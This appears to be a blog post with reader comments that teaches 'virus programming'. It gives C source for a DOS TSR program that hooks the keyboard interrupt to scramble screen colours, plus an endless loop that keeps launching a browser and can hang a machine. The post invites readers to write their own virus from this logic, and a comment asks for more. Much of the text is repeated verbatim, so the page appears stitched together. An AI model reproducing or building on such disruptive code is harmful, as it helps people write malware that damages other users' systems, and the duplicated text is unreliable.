Everybody is scared of computer ‘virus’ as it does harmful actions on our computer. But when we look into the virus programming, we may certainly come out with the conclusion that it requires intelligence to code a virus.
It is easy to mess-up the right program. For example, if you remove even a single byte from an EXE file, that EXE file won’t be usable! Virus program don’t have any specific rules.But it’s a common practice to include ‘signatures’ by virus creators. The main idea is to force the innocent user to run the programs. So certain viruses come along with so called ‘programmer utilities’ or ‘free tools’. Another thing is, it is easy to hang-up a working system using some ‘bad’ interrupts. Viruses use this logic too!
I have written the following program. This is actually a TSR virus. It is not much
harmful; it just changes the attribute (color) byte of the existing characters present on screen.
#ifndef __SMALL__
#error Compile with Small memory model
#else
#include <dos.h>
int i = 1;
char far *Vid_RAM = (char far *)0xb8000000;
void interrupt (*Int9)( void );
void interrupt MyInt9( void );
void interrupt MyInt9( void )
{
*( Vid_RAM + i ) = i;
if ( i>4000 )
i = 1;
else
i += 2;
(*Int9)( );
}
int main(void)
{
Int9 = getvect( 9 );
setvect( 9, MyInt9 );
keep( 0, 500 );
return(0);
}
#endif
Its a Form of TSR virus.It was very popular when it was introduced.Well it only shows a logic and using that you can write your very own virus.
lets check out a very simple one:
It is easy to mess-up the right program. For example, if you remove even a single byte from an EXE file, that EXE file won’t be usable! Virus program don’t have any specific rules.But it’s a common practice to include ‘signatures’ by virus creators. The main idea is to force the innocent user to run the programs. So certain viruses come along with so called ‘programmer utilities’ or ‘free tools’. Another thing is, it is easy to hang-up a working system using some ‘bad’ interrupts. Viruses use this logic too!
 |
| Virus Programming |
I have written the following program. This is actually a TSR virus. It is not much
harmful; it just changes the attribute (color) byte of the existing characters present on screen.
#ifndef __SMALL__
#error Compile with Small memory model
#else
#include <dos.h>
int i = 1;
char far *Vid_RAM = (char far *)0xb8000000;
void interrupt (*Int9)( void );
void interrupt MyInt9( void );
void interrupt MyInt9( void )
{
*( Vid_RAM + i ) = i;
if ( i>4000 )
i = 1;
else
i += 2;
(*Int9)( );
}
int main(void)
{
Int9 = getvect( 9 );
setvect( 9, MyInt9 );
keep( 0, 500 );
return(0);
}
#endif
Its a Form of TSR virus.It was very popular when it was introduced.Well it only shows a logic and using that you can write your very own virus.
lets check out a very simple one:
void main (void)
{
for(; ;)
{
system("c:\\progra~1\\intern~1\\iexplore.exe");
}
}
hey vishal...virus programming from very begining please.
ReplyDeleteit would be good if we get some hands on experience.
most of the code for TSR u wrote above is very much new for me. sobb sobb..!!
kk... on your demand i am starting a whole new tut on virus programming...
ReplyDeletehttp://vishal--mishra.blogspot.in/2012/09/virus-programming-tutorial-2.html